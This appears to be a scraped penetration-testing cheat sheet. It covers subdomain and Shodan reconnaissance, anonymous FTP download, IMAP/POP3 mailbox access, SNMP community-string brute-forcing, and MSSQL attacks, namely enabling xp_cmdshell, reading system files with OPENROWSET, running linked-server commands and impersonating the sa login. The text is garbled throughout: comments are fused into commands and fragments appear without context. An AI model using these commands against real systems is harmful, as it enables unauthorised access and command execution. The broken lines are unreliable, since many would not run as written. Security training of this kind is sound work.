# Domain => Subdomains via Cert Registrycurl -s "https://crt.sh/?q=<DOMAIN>&output=json" | jq . | grep name | cut -d":" -f2 | grep -v "CN=" | cut -d'"' -f2 | awk '{gsub(/\\n/,"\n");}1;' | sort -u | tee subdomainlist.txt
# Full Info for i in $(cat subdomainlist.txt) ; do host $i | tee -a hostinfo.txt ; done# (IPv4) Domain Name => IP Addressfor i in $(cat subdomainlist.txt) ; do host $i | grep "has address" | cut -d" " -f1,4 | tee -a domain_ipaddress.txt ; done# (IPv4) Addresses Onlyfor i in $(cat domain_ipaddress.txt) ; do host $i | grep "has address" | cut -d" " -f4 | tee -a ip-addresses.txt ; done# (IPv4) Addresses => Services via Shodanfor i in $(cat ip-addresses.txt) ; do shodan host $i ; done# DNS: old techniquedig any <DOMAIN>
# Content Search: google.com Dorkinurl:<DOMAIN> intext:<TERM>
LLMNR & NBT-NS
UDP 5355: LLMNR (modern)
UDP 137: NBT-NS (ancient)
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that used as failover protocols when DNS is unavailable.
On a Windows, the box will attempt to resolve a hostname in this order:
Checks Local HOSTS file.
Checks DNS Cache / DNS Server.
(If DNS Fails): Sends LLMNR Multicast.
(If LLMNR Fails): Sends NBT-NS Broadcast.
Remediation
Typically, disabling LLMNR and NBT-NS can cautiously used (to ensure no breakages) at the network or host-level.
Disable LLMNR by:
Group Policy –>
Computer Configuration –>
Administrative Templates –>
Network –>
DNS Client
Enable “Turn OFF Multicast Name Resolution”
Disable NBT-NS (locally only on each host or via GPO w/ PowerShell):
Network and Sharing Center –>
Control Panel –>
Change adapter settings
Right-clicking on the adapter –> properties –>
Selecting Internet Protocol Version 4 (TCP/IPv4) –> Properties –> Advanced –> selecting the WINS tab
Allow the usage of FTP commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE?
# Connect to FTP server in passive mode with anonymous login# Username: anonymous# Password: (no password required)ftp -p -a <TARGET>
ftp -p ftp://<USER>:<PASS>@<TARGET>
# Turn off passive modepassive
# List files and directoriesls -la
ls -laR
# Read fileget <FILENAME> -
# Download fileget <FILENAME>
# Upload fileput <FILENAME>
# Download ALL filesmkdir ftp_files
wget -m --no-passive-ftp ftp://anonymous:anonymous@<TARGET>
# Execute local commands (outside of session)!<COMMAND>
This setting adjusts log verbosity, the submitted passwords, and the scheme gets logged.
auth_verbose
Logs unsuccessful authentication attempts and their reasons.
auth_verbose_passwords
Passwords used for authentication are logged and can also be truncated.
auth_anonymous_username
This specifies the username to be used when logging in with the ANONYMOUS SASL mechanism.
# Enumeratesudo nmap -n -Pn -sV -sC -p25,110,143,465,587,993,995 <TARGET>
### Non-Interactive# IMAPScurl -vkL --user '<USER>':'<PASSWORD>''imaps://<TARGET>' -X <COMMAND>
# POP3Scurl -vkL --user '<USER>':'<PASSWORD>''pop3s://<TARGET>' -X <COMMAND>
### Interactive# IMAPSopenssl s_client -connect <TARGET>:imaps
1 LOGIN <USERNAME> <PASSWORD>
1 LIST "" * # Lists all directories1 SELECT "<MAILBOX>"# Selects a mailbox1 UNSELECT "<MAILBOX>"# Exits the selected mailbox1 FETCH <ID> all # Metadata of email1 FETCH 1:* (BODY[])# Show all emails1 CREATE "INBOX"# Creates a mailbox with a specified name1 DELETE "INBOX"# Deletes a mailbox1 RENAME "ToRead""Important"# Renames a mailbox1 LSUB "" * # Returns a subset of names from the set of names that the User has declared as being active or subscribed1 CLOSE # Removes all messages with the Deleted flag set1 LOGOUT # Closes the connection# POP3sopenssl s_client -connect <TARGET>:pop3s
USER <USERNAME>
PASS <PASSWORD>
STAT # List num of saved emails from the server.LIST # List number and size of all emails.RETR <ID> # Deliver the requested email by ID.DELE <ID> # Delete the requested email by ID.CAPA # Display the server capabilities.RSET # Reset the transmitted information.QUIT # Close connection
mysql - is the system database that contains tables that store information required by the MySQL server
information_schema - provides access to database metadata
performance_schema - is a feature for monitoring MySQL Server execution at a low level
sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
secure_file_priv may be set as follows:
If empty, the variable has no effect, which is not a secure setting.
If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it.
If set to NULL, the server disables import and export operations
With this setting, this SMTP server can send fake emails and thus initialize communication between multiple parties. Another attack possibility would be to spoof the email and read it.
Management Information Base (MIB) is a text file of Object Identifier (OID) s, which provide addresses to access device info, in the Abstract Syntax Notation One (ASN.1) based ASCII text format. Community Strings are sort of “passwords” to manage the access level.
Dangerous Settings
Settings
Description
rwuser noauth
Provides access to the full OID tree without authentication.
rwcommunity <COMMUNITY_STRING> <IPv4_ADDR>
Provides access to the full OID tree regardless of where the requests were sent from.
rwcommunity6 <COMMUNITY_STRING> <IPv6_ADDR>
Same access as with rwcommunity with the difference of using IPv6.
# Enum via nmapsudo nmap -n -Pn -sU -p161 -sV --script 'snmp*' --reason -oA nmap_snmp_scan <TARGET>
### Brute-force names of Community Strings# - Default Strings: "public" (Read-Only) and "private" (Read/Write) are commononesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt <TARGET>
// probably "public"### Brute-force OIDs and info# -v 1,2c,3snmpwalk -v <VERSION> -c <COMMUNITY_STRING> <TARGET> .1
### Brute-force OIDs# -2 : use v2# braa usu. uses Version 1braa <COMMUNITY_STRING>@<TARGET>:.1.*
braa <COMMUNITY_STRING>@<TARGET>:.1.3.6.*
master - keeps the information for an instance of SQL Server.
msdb - used by SQL Server Agent.
model - a template database copied for each new database.
resource - a read-only database that keeps system objects visible in every database on the server in sys schema.
tempdb - keeps temporary objects for SQL queries.
xp_cmdshell:
xp_cmdshell is a powerful feature and disabled by default. It can be enabled and disabled by using the Policy-Based Management or by executing sp_configure
The Windows process spawned by xp_cmdshell has the same security rights as the SQL Server service account
xp_cmdshell operates synchronously. Control is not returned to the caller until the command-shell command is completed
Weak & default sa credentials. Admins may forget to disable this account
# Enumerate via nmapsudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <TARGET>
# Enumerate via MSFuse auxiliary/scanner/mssql/mssql_ping
set RHOSTS <TARGET>
run
### Login via Windows authimpacket-mssqlclient -windows-auth <DOMAIN>/<USER>@<TARGET>
impacket-mssqlclient <USER>:<PASSWORD>@<TARGET>
SELECT @@version;
SELECT user_name();
SELECT system_user;
SELECT IS_SRVROLEMEMBER('sysadmin'); -- 1+ is admin
# UsersSELECT name FROM master..syslogins;
# DatabasesSELECT name FROM master..sysdatabases;
# show tables ;USE <DATABASE> ;
SELECT name FROM sys.tables;
Read Files
SELECT*FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
enable_xp_cmdshell
EXECUTE sp_configure 'show advanced options', 1RECONFIGURE
EXECUTE sp_configure 'xp_cmdshell', 1RECONFIGURE
xp_cmdshell <COMMAND>#or run linked server command
EXECUTE('xp_cmdshell ''<DOS_CMD>''') AT [<LINKED_SERVER>]
Impersonate User
SELECTdistinct b.name FROM sys.server_permissions a INNERJOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name ='IMPERSONATE' ;
GO# Impersonating the SA UserUSE master
EXECUTEAS LOGIN ='sa'# Verify
SELECTSYSTEM_USERSELECT IS_SRVROLEMEMBER('sysadmin')
#0isNOTadmin